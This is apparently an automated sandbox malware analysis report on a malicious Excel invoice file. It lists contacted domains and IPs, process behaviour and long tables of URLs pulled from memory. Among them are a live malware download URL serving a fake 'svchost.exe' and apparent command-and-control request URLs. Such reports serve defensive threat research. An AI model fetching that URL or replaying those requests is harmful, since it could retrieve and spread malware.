          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.athleteshive.com
          208.91.197.91
          truetrue
            unknown
            inreachpt.com
            34.102.136.180
            truetrueunknown
            trijjadigital.com
            166.62.29.42
            truetrue
              unknown
              sndychnesqudusissnvx.dns.army
              103.141.138.125
              truetrueunknown
              mtk-lb-1470093426.us-west-2.elb.amazonaws.com
              44.240.171.172
              truefalse
                high
                shuhan.design
                192.185.35.76
                truetrue
                  unknown
                  www.rentfs.com
                  154.196.151.25
                  truetrue
                    unknown
                    www.calusaptamiami.com
                    unknown
                    unknowntrue
                      unknown
                      www.trijjadigital.com
                      unknown
                      unknowntrue
                        unknown
                        www.shuhan.design
                        unknown
                        unknowntrue
                          unknown
                          www.inreachpt.com
                          unknown
                          unknowntrue
                            unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://sndychnesqudusissnvx.dns.army/documengt/svchost.exetrue
                            • Avira URL Cloud: malware
                            unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                              high
                              http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://search.ebay.de/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                high
                                http://www.mtv.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                  high
                                  http://www.rambler.ru/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://buscar.ya.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2182699706.0000000004B50000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://asp.usatoday.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://rover.ebay.comexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://search.ebay.in/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://%s.comexplorer.exe, 00000006.00000000.2194341895.000000000A330000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          low
                                                          http://msk.afisha.ru/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2165883965.0000000002301000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://search.rediff.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2180707596.0000000003C40000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://search.naver.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://www.google.ru/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://search.daum.net/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://buscar.ozu.es/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://search.about.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.ask.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.cjmall.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://search.centrum.cz/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://suche.t-online.de/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.google.it/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://search.auction.co.kr/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://www.ceneo.pl/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://www.amazon.de/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2189266307.000000000856E000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://sads.myspace.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://search.sify.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://search.ebay.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://search.nifty.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://www.google.si/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.google.cz/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.soso.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.univision.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://search.ebay.it/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://busca.orange.es/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2194341895.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://www.target.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://buscador.terra.es/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://www.iask.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://www.tesco.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://search.interpark.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://investor.msn.com/explorer.exe, 00000006.00000000.2180707596.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://search.espn.go.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://service2.bfast.com/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://www.%s.comPAexplorer.exe, 00000006.00000000.2169916528.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            low
                                                                                                                                                            http://ariadna.elmundo.es/explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              high

                                                                                                                                                              Contacted IPs

                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                              Public

                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              44.240.171.172
                                                                                                                                                              unknownUnited States
                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                              208.91.197.91
                                                                                                                                                              unknownVirgin Islands (BRITISH)
                                                                                                                                                              40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                                              154.196.151.25
                                                                                                                                                              unknownSeychelles
                                                                                                                                                              139646HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHKtrue
                                                                                                                                                              34.102.136.180
                                                                                                                                                              unknownUnited States
                                                                                                                                                              15169GOOGLEUStrue
                                                                                                                                                              166.62.29.42
                                                                                                                                                              unknownUnited States
                                                                                                                                                              26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                                              103.141.138.125
                                                                                                                                                              unknownViet Nam
                                                                                                                                                              135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
                                                                                                                                                              192.185.35.76
                                                                                                                                                              unknownUnited States
                                                                                                                                                              46606UNIFIEDLAYER-AS-1UStrue

                                                                                                                                                              General Information

                                                                                                                                                              Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                              Analysis ID:344804
                                                                                                                                                              Start date:27.01.2021
                                                                                                                                                              Start time:07:28:38
                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 10m 20s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:light
                                                                                                                                                              Sample file name:0113 INV_PAK.xlsx
                                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                              Number of analysed new started processes analysed:9
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:1
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • HDC enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.troj.expl.evad.winXLSX@9/6@8/7
                                                                                                                                                              EGA Information:Failed
                                                                                                                                                              HDC Information:
                                                                                                                                                              • Successful, ratio: 20.1% (good quality ratio 19.2%)
                                                                                                                                                              • Quality average: 70.7%
                                                                                                                                                              • Quality standard deviation: 28.8%
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 96%
                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Adjust boot time
                                                                                                                                                              • Enable AMSI
                                                                                                                                                              • Found application associated with file extension: .xlsx
                                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                              • Attach to Office via COM
                                                                                                                                                              • Scroll down
                                                                                                                                                              • Close Viewer
                                                                                                                                                              Warnings:
                                                                                                                                                              Show All
                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                              • TCP Packets have been reduced to 100

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              07:30:12API Interceptor76x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                              07:30:16API Interceptor103x Sleep call for process: vbc.exe modified
                                                                                                                                                              07:30:42API Interceptor230x Sleep call for process: help.exe modified
                                                                                                                                                              07:31:19API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              44.240.171.1721D1PBttduH.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.calusaptamiami.com/gqx2/?Txl=NDTQX7mfpMrEPR6pWlM56Hgg+STWZd9aU5nak/paKA5FRQwOyK5PIG5qYt4TmNSCcNYYtyIQhA==&vP=lf2X
                                                                                                                                                              208.91.197.91v07PSzmSp9.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.h-v-biz.com/c8so/?3ff87=hsMrMOU643mST3cG5BegBqlrTsujOywA7VDeUpBh8kj+UXdiOmAX38t6MDP4VKlvgbVr&uZWD=XPmPajepJ2gdvnZ
                                                                                                                                                              Request.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.h-v-biz.com/c8so/?Rf=hsMrMOU/4wmWTnQK7BegBqlrTsujOywA7VbOIqdg4Ej/UmxkJ2Rbh4V4PlD+e7xk19hcsA==&LDHHp=z4D80PDX
                                                                                                                                                              KuPBIsrqbO.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.athleteshive.com/gqx2/?MnZ=kdwz49ReWeybRPZJolgC7QJtxuB/meiNTkYp+nGTjDB+7BQCfNz2YW0PX4LStuRlOVbvsJZwJw==&J4n4=xPGHQlaxx
                                                                                                                                                              1D1PBttduH.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.athleteshive.com/gqx2/?vP=lf2X&Txl=kdwz49ReWeybRPZJolgC7QJtxuB/meiNTkYp+nGTjDB+7BQCfNz2YW0PX4LryfxmADHosJZ3aA==
                                                                                                                                                              notice of arrival.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.athleteshive.com/gqx2/?dns0y=kdwz49RbWZyfRfVFqlgC7QJtxuB/meiNTkA5ikaSnjB/7w8EYdi6OSMNUeLU1PJtCjvO1w==&rF=Kxox
                                                                                                                                                              arrival_notice.xlsxGet hashmaliciousBrowse
